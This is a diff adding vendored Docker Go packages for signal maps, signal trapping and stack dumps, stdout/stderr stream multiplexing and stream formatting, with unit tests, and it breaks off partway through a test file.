diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_linux.go b/vendor/github.com/docker/docker/pkg/signal/signal_linux.go
new file mode 100644
index 0000000000..d418cbe9e3
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/signal/signal_linux.go
@@ -0,0 +1,80 @@
+package signal
+
+import (
+	"syscall"
+)
+
+const (
+	sigrtmin = 34
+	sigrtmax = 64
+)
+
+// SignalMap is a map of Linux signals.
+var SignalMap = map[string]syscall.Signal{
+	"ABRT":     syscall.SIGABRT,
+	"ALRM":     syscall.SIGALRM,
+	"BUS":      syscall.SIGBUS,
+	"CHLD":     syscall.SIGCHLD,
+	"CLD":      syscall.SIGCLD,
+	"CONT":     syscall.SIGCONT,
+	"FPE":      syscall.SIGFPE,
+	"HUP":      syscall.SIGHUP,
+	"ILL":      syscall.SIGILL,
+	"INT":      syscall.SIGINT,
+	"IO":       syscall.SIGIO,
+	"IOT":      syscall.SIGIOT,
+	"KILL":     syscall.SIGKILL,
+	"PIPE":     syscall.SIGPIPE,
+	"POLL":     syscall.SIGPOLL,
+	"PROF":     syscall.SIGPROF,
+	"PWR":      syscall.SIGPWR,
+	"QUIT":     syscall.SIGQUIT,
+	"SEGV":     syscall.SIGSEGV,
+	"STKFLT":   syscall.SIGSTKFLT,
+	"STOP":     syscall.SIGSTOP,
+	"SYS":      syscall.SIGSYS,
+	"TERM":     syscall.SIGTERM,
+	"TRAP":     syscall.SIGTRAP,
+	"TSTP":     syscall.SIGTSTP,
+	"TTIN":     syscall.SIGTTIN,
+	"TTOU":     syscall.SIGTTOU,
+	"UNUSED":   syscall.SIGUNUSED,
+	"URG":      syscall.SIGURG,
+	"USR1":     syscall.SIGUSR1,
+	"USR2":     syscall.SIGUSR2,
+	"VTALRM":   syscall.SIGVTALRM,
+	"WINCH":    syscall.SIGWINCH,
+	"XCPU":     syscall.SIGXCPU,
+	"XFSZ":     syscall.SIGXFSZ,
+	"RTMIN":    sigrtmin,
+	"RTMIN+1":  sigrtmin + 1,
+	"RTMIN+2":  sigrtmin + 2,
+	"RTMIN+3":  sigrtmin + 3,
+	"RTMIN+4":  sigrtmin + 4,
+	"RTMIN+5":  sigrtmin + 5,
+	"RTMIN+6":  sigrtmin + 6,
+	"RTMIN+7":  sigrtmin + 7,
+	"RTMIN+8":  sigrtmin + 8,
+	"RTMIN+9":  sigrtmin + 9,
+	"RTMIN+10": sigrtmin + 10,
+	"RTMIN+11": sigrtmin + 11,
+	"RTMIN+12": sigrtmin + 12,
+	"RTMIN+13": sigrtmin + 13,
+	"RTMIN+14": sigrtmin + 14,
+	"RTMIN+15": sigrtmin + 15,
+	"RTMAX-14": sigrtmax - 14,
+	"RTMAX-13": sigrtmax - 13,
+	"RTMAX-12": sigrtmax - 12,
+	"RTMAX-11": sigrtmax - 11,
+	"RTMAX-10": sigrtmax - 10,
+	"RTMAX-9":  sigrtmax - 9,
+	"RTMAX-8":  sigrtmax - 8,
+	"RTMAX-7":  sigrtmax - 7,
+	"RTMAX-6":  sigrtmax - 6,
+	"RTMAX-5":  sigrtmax - 5,
+	"RTMAX-4":  sigrtmax - 4,
+	"RTMAX-3":  sigrtmax - 3,
+	"RTMAX-2":  sigrtmax - 2,
+	"RTMAX-1":  sigrtmax - 1,
+	"RTMAX":    sigrtmax,
+}
diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_solaris.go b/vendor/github.com/docker/docker/pkg/signal/signal_solaris.go
new file mode 100644
index 0000000000..89576b9e3b
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/signal/signal_solaris.go
@@ -0,0 +1,42 @@
+package signal
+
+import (
+	"syscall"
+)
+
+// SignalMap is a map of Solaris signals.
+// SIGINFO and SIGTHR not defined for Solaris
+var SignalMap = map[string]syscall.Signal{
+	"ABRT":   syscall.SIGABRT,
+	"ALRM":   syscall.SIGALRM,
+	"BUF":    syscall.SIGBUS,
+	"CHLD":   syscall.SIGCHLD,
+	"CONT":   syscall.SIGCONT,
+	"EMT":    syscall.SIGEMT,
+	"FPE":    syscall.SIGFPE,
+	"HUP":    syscall.SIGHUP,
+	"ILL":    syscall.SIGILL,
+	"INT":    syscall.SIGINT,
+	"IO":     syscall.SIGIO,
+	"IOT":    syscall.SIGIOT,
+	"KILL":   syscall.SIGKILL,
+	"LWP":    syscall.SIGLWP,
+	"PIPE":   syscall.SIGPIPE,
+	"PROF":   syscall.SIGPROF,
+	"QUIT":   syscall.SIGQUIT,
+	"SEGV":   syscall.SIGSEGV,
+	"STOP":   syscall.SIGSTOP,
+	"SYS":    syscall.SIGSYS,
+	"TERM":   syscall.SIGTERM,
+	"TRAP":   syscall.SIGTRAP,
+	"TSTP":   syscall.SIGTSTP,
+	"TTIN":   syscall.SIGTTIN,
+	"TTOU":   syscall.SIGTTOU,
+	"URG":    syscall.SIGURG,
+	"USR1":   syscall.SIGUSR1,
+	"USR2":   syscall.SIGUSR2,
+	"VTALRM": syscall.SIGVTALRM,
+	"WINCH":  syscall.SIGWINCH,
+	"XCPU":   syscall.SIGXCPU,
+	"XFSZ":   syscall.SIGXFSZ,
+}
diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_unix.go b/vendor/github.com/docker/docker/pkg/signal/signal_unix.go
new file mode 100644
index 0000000000..5d058fd56b
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/signal/signal_unix.go
@@ -0,0 +1,21 @@
+// +build !windows
+
+package signal
+
+import (
+	"syscall"
+)
+
+// Signals used in cli/command (no windows equivalent, use
+// invalid signals so they don't get handled)
+
+const (
+	// SIGCHLD is a signal sent to a process when a child process terminates, is interrupted, or resumes after being interrupted.
+	SIGCHLD = syscall.SIGCHLD
+	// SIGWINCH is a signal sent to a process when its controlling terminal changes its size
+	SIGWINCH = syscall.SIGWINCH
+	// SIGPIPE is a signal sent to a process when a pipe is written to before the other end is open for reading
+	SIGPIPE = syscall.SIGPIPE
+	// DefaultStopSignal is the syscall signal used to stop a container in unix systems.
+	DefaultStopSignal = "SIGTERM"
+)
diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_unsupported.go b/vendor/github.com/docker/docker/pkg/signal/signal_unsupported.go
new file mode 100644
index 0000000000..c592d37dfe
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/signal/signal_unsupported.go
@@ -0,0 +1,10 @@
+// +build !linux,!darwin,!freebsd,!windows,!solaris
+
+package signal
+
+import (
+	"syscall"
+)
+
+// SignalMap is an empty map of signals for unsupported platform.
+var SignalMap = map[string]syscall.Signal{}
diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_windows.go b/vendor/github.com/docker/docker/pkg/signal/signal_windows.go
new file mode 100644
index 0000000000..440f2700e2
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/signal/signal_windows.go
@@ -0,0 +1,28 @@
+// +build windows
+
+package signal
+
+import (
+	"syscall"
+)
+
+// Signals used in cli/command (no windows equivalent, use
+// invalid signals so they don't get handled)
+const (
+	SIGCHLD  = syscall.Signal(0xff)
+	SIGWINCH = syscall.Signal(0xff)
+	SIGPIPE  = syscall.Signal(0xff)
+	// DefaultStopSignal is the syscall signal used to stop a container in windows systems.
+	DefaultStopSignal = "15"
+)
+
+// SignalMap is a map of "supported" signals. As per the comment in GOLang's
+// ztypes_windows.go: "More invented values for signals". Windows doesn't
+// really support signals in any way, shape or form that Unix does.
+//
+// We have these so that docker kill can be used to gracefully (TERM) and
+// forcibly (KILL) terminate a container on Windows.
+var SignalMap = map[string]syscall.Signal{
+	"KILL": syscall.SIGKILL,
+	"TERM": syscall.SIGTERM,
+}
diff --git a/vendor/github.com/docker/docker/pkg/signal/trap.go b/vendor/github.com/docker/docker/pkg/signal/trap.go
new file mode 100644
index 0000000000..638a1ab66c
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/signal/trap.go
@@ -0,0 +1,103 @@
+package signal
+
+import (
+	"fmt"
+	"os"
+	gosignal "os/signal"
+	"path/filepath"
+	"runtime"
+	"strings"
+	"sync/atomic"
+	"syscall"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/pkg/errors"
+)
+
+// Trap sets up a simplified signal "trap", appropriate for common
+// behavior expected from a vanilla unix command-line tool in general
+// (and the Docker engine in particular).
+//
+// * If SIGINT or SIGTERM are received, `cleanup` is called, then the process is terminated.
+// * If SIGINT or SIGTERM are received 3 times before cleanup is complete, then cleanup is
+//   skipped and the process is terminated immediately (allows force quit of stuck daemon)
+// * A SIGQUIT always causes an exit without cleanup, with a goroutine dump preceding exit.
+// * Ignore SIGPIPE events. These are generated by systemd when journald is restarted while
+//   the docker daemon is not restarted and also running under systemd.
+//   Fixes https://github.com/docker/docker/issues/19728
+//
+func Trap(cleanup func()) {
+	c := make(chan os.Signal, 1)
+	// we will handle INT, TERM, QUIT, SIGPIPE here
+	signals := []os.Signal{os.Interrupt, syscall.SIGTERM, syscall.SIGQUIT, syscall.SIGPIPE}
+	gosignal.Notify(c, signals...)
+	go func() {
+		interruptCount := uint32(0)
+		for sig := range c {
+			if sig == syscall.SIGPIPE {
+				continue
+			}
+
+			go func(sig os.Signal) {
+				logrus.Infof("Processing signal '%v'", sig)
+				switch sig {
+				case os.Interrupt, syscall.SIGTERM:
+					if atomic.LoadUint32(&interruptCount) < 3 {
+						// Initiate the cleanup only once
+						if atomic.AddUint32(&interruptCount, 1) == 1 {
+							// Call the provided cleanup handler
+							cleanup()
+							os.Exit(0)
+						} else {
+							return
+						}
+					} else {
+						// 3 SIGTERM/INT signals received; force exit without cleanup
+						logrus.Info("Forcing docker daemon shutdown without cleanup; 3 interrupts received")
+					}
+				case syscall.SIGQUIT:
+					DumpStacks("")
+					logrus.Info("Forcing docker daemon shutdown without cleanup on SIGQUIT")
+				}
+				//for the SIGINT/TERM, and SIGQUIT non-clean shutdown case, exit with 128 + signal #
+				os.Exit(128 + int(sig.(syscall.Signal)))
+			}(sig)
+		}
+	}()
+}
+
+const stacksLogNameTemplate = "goroutine-stacks-%s.log"
+
+// DumpStacks appends the runtime stack into file in dir and returns full path
+// to that file.
+func DumpStacks(dir string) (string, error) {
+	var (
+		buf       []byte
+		stackSize int
+	)
+	bufferLen := 16384
+	for stackSize == len(buf) {
+		buf = make([]byte, bufferLen)
+		stackSize = runtime.Stack(buf, true)
+		bufferLen *= 2
+	}
+	buf = buf[:stackSize]
+	var f *os.File
+	if dir != "" {
+		path := filepath.Join(dir, fmt.Sprintf(stacksLogNameTemplate, strings.Replace(time.Now().Format(time.RFC3339), ":", "", -1)))
+		var err error
+		f, err = os.OpenFile(path, os.O_CREATE|os.O_WRONLY, 0666)
+		if err != nil {
+			return "", errors.Wrap(err, "failed to open file to write the goroutine stacks")
+		}
+		defer f.Close()
+		defer f.Sync()
+	} else {
+		f = os.Stderr
+	}
+	if _, err := f.Write(buf); err != nil {
+		return "", errors.Wrap(err, "failed to write goroutine stacks")
+	}
+	return f.Name(), nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy.go b/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy.go
new file mode 100644
index 0000000000..be20765457
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy.go
@@ -0,0 +1,174 @@
+package stdcopy
+
+import (
+	"bytes"
+	"encoding/binary"
+	"errors"
+	"fmt"
+	"io"
+	"sync"
+)
+
+// StdType is the type of standard stream
+// a writer can multiplex to.
+type StdType byte
+
+const (
+	// Stdin represents standard input stream type.
+	Stdin StdType = iota
+	// Stdout represents standard output stream type.
+	Stdout
+	// Stderr represents standard error steam type.
+	Stderr
+
+	stdWriterPrefixLen = 8
+	stdWriterFdIndex   = 0
+	stdWriterSizeIndex = 4
+
+	startingBufLen = 32*1024 + stdWriterPrefixLen + 1
+)
+
+var bufPool = &sync.Pool{New: func() interface{} { return bytes.NewBuffer(nil) }}
+
+// stdWriter is wrapper of io.Writer with extra customized info.
+type stdWriter struct {
+	io.Writer
+	prefix byte
+}
+
+// Write sends the buffer to the underneath writer.
+// It inserts the prefix header before the buffer,
+// so stdcopy.StdCopy knows where to multiplex the output.
+// It makes stdWriter to implement io.Writer.
+func (w *stdWriter) Write(p []byte) (n int, err error) {
+	if w == nil || w.Writer == nil {
+		return 0, errors.New("Writer not instantiated")
+	}
+	if p == nil {
+		return 0, nil
+	}
+
+	header := [stdWriterPrefixLen]byte{stdWriterFdIndex: w.prefix}
+	binary.BigEndian.PutUint32(header[stdWriterSizeIndex:], uint32(len(p)))
+	buf := bufPool.Get().(*bytes.Buffer)
+	buf.Write(header[:])
+	buf.Write(p)
+
+	n, err = w.Writer.Write(buf.Bytes())
+	n -= stdWriterPrefixLen
+	if n < 0 {
+		n = 0
+	}
+
+	buf.Reset()
+	bufPool.Put(buf)
+	return
+}
+
+// NewStdWriter instantiates a new Writer.
+// Everything written to it will be encapsulated using a custom format,
+// and written to the underlying `w` stream.
+// This allows multiple write streams (e.g. stdout and stderr) to be muxed into a single connection.
+// `t` indicates the id of the stream to encapsulate.
+// It can be stdcopy.Stdin, stdcopy.Stdout, stdcopy.Stderr.
+func NewStdWriter(w io.Writer, t StdType) io.Writer {
+	return &stdWriter{
+		Writer: w,
+		prefix: byte(t),
+	}
+}
+
+// StdCopy is a modified version of io.Copy.
+//
+// StdCopy will demultiplex `src`, assuming that it contains two streams,
+// previously multiplexed together using a StdWriter instance.
+// As it reads from `src`, StdCopy will write to `dstout` and `dsterr`.
+//
+// StdCopy will read until it hits EOF on `src`. It will then return a nil error.
+// In other words: if `err` is non nil, it indicates a real underlying error.
+//
+// `written` will hold the total number of bytes written to `dstout` and `dsterr`.
+func StdCopy(dstout, dsterr io.Writer, src io.Reader) (written int64, err error) {
+	var (
+		buf       = make([]byte, startingBufLen)
+		bufLen    = len(buf)
+		nr, nw    int
+		er, ew    error
+		out       io.Writer
+		frameSize int
+	)
+
+	for {
+		// Make sure we have at least a full header
+		for nr < stdWriterPrefixLen {
+			var nr2 int
+			nr2, er = src.Read(buf[nr:])
+			nr += nr2
+			if er == io.EOF {
+				if nr < stdWriterPrefixLen {
+					return written, nil
+				}
+				break
+			}
+			if er != nil {
+				return 0, er
+			}
+		}
+
+		// Check the first byte to know where to write
+		switch StdType(buf[stdWriterFdIndex]) {
+		case Stdin:
+			fallthrough
+		case Stdout:
+			// Write on stdout
+			out = dstout
+		case Stderr:
+			// Write on stderr
+			out = dsterr
+		default:
+			return 0, fmt.Errorf("Unrecognized input header: %d", buf[stdWriterFdIndex])
+		}
+
+		// Retrieve the size of the frame
+		frameSize = int(binary.BigEndian.Uint32(buf[stdWriterSizeIndex : stdWriterSizeIndex+4]))
+
+		// Check if the buffer is big enough to read the frame.
+		// Extend it if necessary.
+		if frameSize+stdWriterPrefixLen > bufLen {
+			buf = append(buf, make([]byte, frameSize+stdWriterPrefixLen-bufLen+1)...)
+			bufLen = len(buf)
+		}
+
+		// While the amount of bytes read is less than the size of the frame + header, we keep reading
+		for nr < frameSize+stdWriterPrefixLen {
+			var nr2 int
+			nr2, er = src.Read(buf[nr:])
+			nr += nr2
+			if er == io.EOF {
+				if nr < frameSize+stdWriterPrefixLen {
+					return written, nil
+				}
+				break
+			}
+			if er != nil {
+				return 0, er
+			}
+		}
+
+		// Write the retrieved frame (without header)
+		nw, ew = out.Write(buf[stdWriterPrefixLen : frameSize+stdWriterPrefixLen])
+		if ew != nil {
+			return 0, ew
+		}
+		// If the frame has not been fully written: error
+		if nw != frameSize {
+			return 0, io.ErrShortWrite
+		}
+		written += int64(nw)
+
+		// Move the rest of the buffer to the beginning
+		copy(buf, buf[frameSize+stdWriterPrefixLen:])
+		// Move the index
+		nr -= frameSize + stdWriterPrefixLen
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy_test.go b/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy_test.go
new file mode 100644
index 0000000000..3137a75239
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy_test.go
@@ -0,0 +1,260 @@
+package stdcopy
+
+import (
+	"bytes"
+	"errors"
+	"io"
+	"io/ioutil"
+	"strings"
+	"testing"
+)
+
+func TestNewStdWriter(t *testing.T) {
+	writer := NewStdWriter(ioutil.Discard, Stdout)
+	if writer == nil {
+		t.Fatalf("NewStdWriter with an invalid StdType should not return nil.")
+	}
+}
+
+func TestWriteWithUnitializedStdWriter(t *testing.T) {
+	writer := stdWriter{
+		Writer: nil,
+		prefix: byte(Stdout),
+	}
+	n, err := writer.Write([]byte("Something here"))
+	if n != 0 || err == nil {
+		t.Fatalf("Should fail when given an uncomplete or uninitialized StdWriter")
+	}
+}
+
+func TestWriteWithNilBytes(t *testing.T) {
+	writer := NewStdWriter(ioutil.Discard, Stdout)
+	n, err := writer.Write(nil)
+	if err != nil {
+		t.Fatalf("Shouldn't have fail when given no data")
+	}
+	if n > 0 {
+		t.Fatalf("Write should have written 0 byte, but has written %d", n)
+	}
+}
+
+func TestWrite(t *testing.T) {
+	writer := NewStdWriter(ioutil.Discard, Stdout)
+	data := []byte("Test StdWrite.Write")
+	n, err := writer.Write(data)
+	if err != nil {
+		t.Fatalf("Error while writing with StdWrite")
+	}
+	if n != len(data) {
+		t.Fatalf("Write should have written %d byte but wrote %d.", len(data), n)
+	}
+}
+
+type errWriter struct {
+	n   int
+	err error
+}
+
+func (f *errWriter) Write(buf []byte) (int, error) {
+	return f.n, f.err
+}
+
+func TestWriteWithWriterError(t *testing.T) {
+	expectedError := errors.New("expected")
+	expectedReturnedBytes := 10
+	writer := NewStdWriter(&errWriter{
+		n:   stdWriterPrefixLen + expectedReturnedBytes,
+		err: expectedError}, Stdout)
+	data := []byte("This won't get written, sigh")
+	n, err := writer.Write(data)
+	if err != expectedError {
+		t.Fatalf("Didn't get expected error.")
+	}
+	if n != expectedReturnedBytes {
+		t.Fatalf("Didn't get expected written bytes %d, got %d.",
+			expectedReturnedBytes, n)
+	}
+}
+
+func TestWriteDoesNotReturnNegativeWrittenBytes(t *testing.T) {
+	writer := NewStdWriter(&errWriter{n: -1}, Stdout)
+	data := []byte("This won't get written, sigh")
+	actual, _ := writer.Write(data)
+	if actual != 0 {
+		t.Fatalf("Expected returned written bytes equal to 0, got %d", actual)
+	}
+}
+
+func getSrcBuffer(stdOutBytes, stdErrBytes []byte) (buffer *bytes.Buffer, err error) {
+	buffer = new(bytes.Buffer)
+	dstOut := NewStdWriter(buffer, Stdout)
+	_, err = dstOut.Write(stdOutBytes)
+	if err != nil {
+		return
+	}
+	dstErr := NewStdWriter(buffer, Stderr)
+	_, err = dstErr.Write(stdErrBytes)
+	return
+}
+
+func TestStdCopyWriteAndRead(t *testing.T) {
+	stdOutBytes := []byte(strings.Repeat("o", startingBufLen))
+	stdErrBytes := []byte(strings.Repeat("e", startingBufLen))
+	buffer, err := getSrcBuffer(stdOutBytes, stdErrBytes)
+	if err != nil {
+		t.Fatal(err)
+	}
+	written, err := StdCopy(ioutil.Discard, ioutil.Discard, buffer)
+	if err != nil {
+		t.Fatal(err)
+	}
+	expectedTotalWritten := len(stdOutBytes) + len(stdErrBytes)
+	if written != int64(expectedTotalWritten) {
+		t.Fatalf("Expected to have total of %d bytes written, got %d", expectedTotalWritten, written)
+	}
+}
+
+type customReader struct {
+	n            int
+	err          error
+	totalCalls   int
+	correctCalls int
+	src          *bytes.Buffer
+}
+
+func (f *customReader) Read(buf []byte) (int, error) {
+	f.totalCalls++
+	if f.totalCalls <= f.correctCalls {
+		return f.src.Read(buf)
+	}
+	return f.n, f.err
+}
+
+func TestStdCopyReturnsErrorReadingHeader(t *testing.T) {
+	expectedError := errors.New("error")
+	reader := &customReader{
+		err: expectedError}
+	written, err := StdCopy(ioutil.Discard, ioutil.Discard, reader)
+	if written != 0 {
+		t.Fatalf("Expected 0 bytes read, got %d", written)
+	}
+	if err != expectedError {
+		t.Fatalf("Didn't get expected error")
+	}
+}
+
+func TestStdCopyReturnsErrorReadingFrame(t *testing.T) {
+	expectedError := errors.New("error")
+	stdOutBytes := []byte(strings.Repeat("o", startingBufLen))
+	stdErrBytes := []byte(strings.Repeat("e", startingBufLen))
+	buffer, err := getSrcBuffer(stdOutBytes, stdErrBytes)
+	if err != nil {
+		t.Fatal(err)
+	}
+	reader := &customReader{
+		correctCalls: 1,
+		n:            stdWriterPrefixLen + 1,
+		err:          expectedError,
+		src:          buffer}
+	written, err := StdCopy(ioutil.Discard, ioutil.Discard, reader)
+	if written != 0 {
+		t.Fatalf("Expected 0 bytes read, got %d", written)
+	}
+	if err != expectedError {
+		t.Fatalf("Didn't get expected error")
+	}
+}
+
+func TestStdCopyDetectsCorruptedFrame(t *testing.T) {
+	stdOutBytes := []byte(strings.Repeat("o", startingBufLen))
+	stdErrBytes := []byte(strings.Repeat("e", startingBufLen))
+	buffer, err := getSrcBuffer(stdOutBytes, stdErrBytes)
+	if err != nil {
+		t.Fatal(err)
+	}
+	reader := &customReader{
+		correctCalls: 1,
+		n:            stdWriterPrefixLen + 1,
+		err:          io.EOF,
+		src:          buffer}
+	written, err := StdCopy(ioutil.Discard, ioutil.Discard, reader)
+	if written != startingBufLen {
+		t.Fatalf("Expected %d bytes read, got %d", startingBufLen, written)
+	}
+	if err != nil {
+		t.Fatal("Didn't get nil error")
+	}
+}
+
+func TestStdCopyWithInvalidInputHeader(t *testing.T) {
+	dstOut := NewStdWriter(ioutil.Discard, Stdout)
+	dstErr := NewStdWriter(ioutil.Discard, Stderr)
+	src := strings.NewReader("Invalid input")
+	_, err := StdCopy(dstOut, dstErr, src)
+	if err == nil {
+		t.Fatal("StdCopy with invalid input header should fail.")
+	}
+}
+
+func TestStdCopyWithCorruptedPrefix(t *testing.T) {
+	data := []byte{0x01, 0x02, 0x03}
+	src := bytes.NewReader(data)
+	written, err := StdCopy(nil, nil, src)
+	if err != nil {
+		t.Fatalf("StdCopy should not return an error with corrupted prefix.")
+	}
+	if written != 0 {
+		t.Fatalf("StdCopy should have written 0, but has written %d", written)
+	}
+}
+
+func TestStdCopyReturnsWriteErrors(t *testing.T) {
+	stdOutBytes := []byte(strings.Repeat("o", startingBufLen))
+	stdErrBytes := []byte(strings.Repeat("e", startingBufLen))
+	buffer, err := getSrcBuffer(stdOutBytes, stdErrBytes)
+	if err != nil {
+		t.Fatal(err)
+	}
+	expectedError := errors.New("expected")
+
+	dstOut := &errWriter{err: expectedError}
+
+	written, err := StdCopy(dstOut, ioutil.Discard, buffer)
+	if written != 0 {
+		t.Fatalf("StdCopy should have written 0, but has written %d", written)
+	}
+	if err != expectedError {
+		t.Fatalf("Didn't get expected error, got %v", err)
+	}
+}
+
+func TestStdCopyDetectsNotFullyWrittenFrames(t *testing.T) {
+	stdOutBytes := []byte(strings.Repeat("o", startingBufLen))
+	stdErrBytes := []byte(strings.Repeat("e", startingBufLen))
+	buffer, err := getSrcBuffer(stdOutBytes, stdErrBytes)
+	if err != nil {
+		t.Fatal(err)
+	}
+	dstOut := &errWriter{n: startingBufLen - 10}
+
+	written, err := StdCopy(dstOut, ioutil.Discard, buffer)
+	if written != 0 {
+		t.Fatalf("StdCopy should have return 0 written bytes, but returned %d", written)
+	}
+	if err != io.ErrShortWrite {
+		t.Fatalf("Didn't get expected io.ErrShortWrite error")
+	}
+}
+
+func BenchmarkWrite(b *testing.B) {
+	w := NewStdWriter(ioutil.Discard, Stdout)
+	data := []byte("Test line for testing stdwriter performance\n")
+	data = bytes.Repeat(data, 100)
+	b.SetBytes(int64(len(data)))
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		if _, err := w.Write(data); err != nil {
+			b.Fatal(err)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter.go b/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter.go
new file mode 100644
index 0000000000..ce6ea79dee
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter.go
@@ -0,0 +1,172 @@
+// Package streamformatter provides helper functions to format a stream.
+package streamformatter
+
+import (
+	"encoding/json"
+	"fmt"
+	"io"
+
+	"github.com/docker/docker/pkg/jsonmessage"
+	"github.com/docker/docker/pkg/progress"
+)
+
+// StreamFormatter formats a stream, optionally using JSON.
+type StreamFormatter struct {
+	json bool
+}
+
+// NewStreamFormatter returns a simple StreamFormatter
+func NewStreamFormatter() *StreamFormatter {
+	return &StreamFormatter{}
+}
+
+// NewJSONStreamFormatter returns a StreamFormatter configured to stream json
+func NewJSONStreamFormatter() *StreamFormatter {
+	return &StreamFormatter{true}
+}
+
+const streamNewline = "\r\n"
+
+var streamNewlineBytes = []byte(streamNewline)
+
+// FormatStream formats the specified stream.
+func (sf *StreamFormatter) FormatStream(str string) []byte {
+	if sf.json {
+		b, err := json.Marshal(&jsonmessage.JSONMessage{Stream: str})
+		if err != nil {
+			return sf.FormatError(err)
+		}
+		return append(b, streamNewlineBytes...)
+	}
+	return []byte(str + "\r")
+}
+
+// FormatStatus formats the specified objects according to the specified format (and id).
+func (sf *StreamFormatter) FormatStatus(id, format string, a ...interface{}) []byte {
+	str := fmt.Sprintf(format, a...)
+	if sf.json {
+		b, err := json.Marshal(&jsonmessage.JSONMessage{ID: id, Status: str})
+		if err != nil {
+			return sf.FormatError(err)
+		}
+		return append(b, streamNewlineBytes...)
+	}
+	return []byte(str + streamNewline)
+}
+
+// FormatError formats the specified error.
+func (sf *StreamFormatter) FormatError(err error) []byte {
+	if sf.json {
+		jsonError, ok := err.(*jsonmessage.JSONError)
+		if !ok {
+			jsonError = &jsonmessage.JSONError{Message: err.Error()}
+		}
+		if b, err := json.Marshal(&jsonmessage.JSONMessage{Error: jsonError, ErrorMessage: err.Error()}); err == nil {
+			return append(b, streamNewlineBytes...)
+		}
+		return []byte("{\"error\":\"format error\"}" + streamNewline)
+	}
+	return []byte("Error: " + err.Error() + streamNewline)
+}
+
+// FormatProgress formats the progress information for a specified action.
+func (sf *StreamFormatter) FormatProgress(id, action string, progress *jsonmessage.JSONProgress, aux interface{}) []byte {
+	if progress == nil {
+		progress = &jsonmessage.JSONProgress{}
+	}
+	if sf.json {
+		var auxJSON *json.RawMessage
+		if aux != nil {
+			auxJSONBytes, err := json.Marshal(aux)
+			if err != nil {
+				return nil
+			}
+			auxJSON = new(json.RawMessage)
+			*auxJSON = auxJSONBytes
+		}
+		b, err := json.Marshal(&jsonmessage.JSONMessage{
+			Status:          action,
+			ProgressMessage: progress.String(),
+			Progress:        progress,
+			ID:              id,
+			Aux:             auxJSON,
+		})
+		if err != nil {
+			return nil
+		}
+		return append(b, streamNewlineBytes...)
+	}
+	endl := "\r"
+	if progress.String() == "" {
+		endl += "\n"
+	}
+	return []byte(action + " " + progress.String() + endl)
+}
+
+// NewProgressOutput returns a progress.Output object that can be passed to
+// progress.NewProgressReader.
+func (sf *StreamFormatter) NewProgressOutput(out io.Writer, newLines bool) progress.Output {
+	return &progressOutput{
+		sf:       sf,
+		out:      out,
+		newLines: newLines,
+	}
+}
+
+type progressOutput struct {
+	sf       *StreamFormatter
+	out      io.Writer
+	newLines bool
+}
+
+// WriteProgress formats progress information from a ProgressReader.
+func (out *progressOutput) WriteProgress(prog progress.Progress) error {
+	var formatted []byte
+	if prog.Message != "" {
+		formatted = out.sf.FormatStatus(prog.ID, prog.Message)
+	} else {
+		jsonProgress := jsonmessage.JSONProgress{Current: prog.Current, Total: prog.Total}
+		formatted = out.sf.FormatProgress(prog.ID, prog.Action, &jsonProgress, prog.Aux)
+	}
+	_, err := out.out.Write(formatted)
+	if err != nil {
+		return err
+	}
+
+	if out.newLines && prog.LastUpdate {
+		_, err = out.out.Write(out.sf.FormatStatus("", ""))
+		return err
+	}
+
+	return nil
+}
+
+// StdoutFormatter is a streamFormatter that writes to the standard output.
+type StdoutFormatter struct {
+	io.Writer
+	*StreamFormatter
+}
+
+func (sf *StdoutFormatter) Write(buf []byte) (int, error) {
+	formattedBuf := sf.StreamFormatter.FormatStream(string(buf))
+	n, err := sf.Writer.Write(formattedBuf)
+	if n != len(formattedBuf) {
+		return n, io.ErrShortWrite
+	}
+	return len(buf), err
+}
+
+// StderrFormatter is a streamFormatter that writes to the standard error.
+type StderrFormatter struct {
+	io.Writer
+	*StreamFormatter
+}
+
+func (sf *StderrFormatter) Write(buf []byte) (int, error) {
+	formattedBuf := sf.StreamFormatter.FormatStream("\033[91m" + string(buf) + "\033[0m")
+	n, err := sf.Writer.Write(formattedBuf)
+	if n != len(formattedBuf) {
+		return n, io.ErrShortWrite
+	}
+	return len(buf), err
+}
diff --git a/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter_test.go b/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter_test.go
new file mode 100644
index 0000000000..93ec90f5f7
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter_test.go
@@ -0,0 +1,108 @@
+package streamformatter
+
+import (
+	"encoding/json"
+	"errors"
+	"reflect"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/pkg/jsonmessage"
+)
+
+func TestFormatStream(t *testing.T) {
+	sf := NewStreamFormatter()
+	res := sf.FormatStream("stream")
+	if string(res) != "stream"+"\r" {
+		t.Fatalf("%q", res)
+	}
+}
+
+func TestFormatJSONStatus(t *testing.T) {
+	sf := NewStreamFormatter()
+	res := sf.FormatStatus("ID", "%s%d", "a", 1)
+	if string(res) != "a1\r\n" {
+		t.Fatalf("%q", res)
+	}
+}
+
+func TestFormatSimpleError(t *testing.T) {
+	sf := NewStreamFormatter()
+	res := sf.FormatError(errors.New("Error for formatter"))
+	if string(res) != "Error: Error for formatter\r\n" {
+		t.Fatalf("%q", res)
+	}
+}
+
+func TestJSONFormatStream(t *testing.T) {
+	sf := NewJSONStreamFormatter()
